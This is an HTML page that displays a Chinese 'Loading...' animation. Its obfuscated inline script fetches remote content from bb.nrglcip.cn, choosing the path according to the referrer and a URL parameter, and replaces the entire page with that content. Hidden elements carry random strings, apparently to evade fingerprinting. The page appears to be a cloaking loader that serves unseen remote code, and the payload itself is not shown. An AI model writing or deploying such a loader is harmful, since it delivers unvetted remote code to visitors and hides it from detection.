<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .UQYvGh8Wh {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .UQYvGh8Wh .CMyCJc {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .UQYvGh8Wh .content {
            line-height: 50px;
            text-align: center
        }

        .UQYvGh8Wh .img {
            width: 100%
        }

        .UQYvGh8Wh .fflArhPG {
            text-align: center
        }

        .UQYvGh8Wh .fflArhPG span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .UQYvGh8Wh .fflArhPG span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .UQYvGh8Wh .fflArhPG span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .UQYvGh8Wh .fflArhPG span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .UQYvGh8Wh .fflArhPG span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .UQYvGh8Wh .fflArhPG span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .UQYvGh8Wh .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function gObHe2S2BNwZf(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var iLmMF = gObHe2S2BNwZf('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ iLmMF +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ iLmMF +".html?a=share";
		}
		
        YP9gVpxI=url+"#"+new Date().getTime();
        YP9gVpxI && function() {
            $.get(YP9gVpxI, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>qxOCBGo50n8ACAqr9lGAz83gLGq6shCIlcq5TwIwImFdAd9f3ntese7wdKwivCJ8JWqRKmD9jHJ4AAZ5iLqp</div>
<img  src='' style='display:none'>
<p  style='display:none'>UmPjmBlo8HcERWMuZ1ToZn4ybcTmDIAmJRMnX4jh9AKPWnLAxPCOTD1gawmegHPk0qWV9I3bFyl7eixMLuW</p><div class="UQYvGh8Wh">
    <div class="CMyCJc">
        <div class="fflArhPG">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>uJRO2HtyGfD9pIAyrvdlIRBlNgdVZNQu4y8OCGINYghEInqNR0U1U8xkHPtS0mi774RgEQ2HeTi0B</a>
<p  style='display:none'>pEW4VbafDOIYKEUxUwAMgDUmfJCAj01aAzwldPHlNA16As3yybcu8xkwEcbX</p>
<img  src='' style='display:none'>
<b style='display:none' >Szp0UGGUcHfdZG8rRob1Olml9uoAWzmnQnGU4SJUkUvjx2KHr5jG25HFqelWRvY35vNrOoc3joljpAizeXC7u1V</b>
<h1 style='display:none' >QyJiq5PzgJQtD7j0u9w4fyRH8djvOGGuB</h1></body>
</html>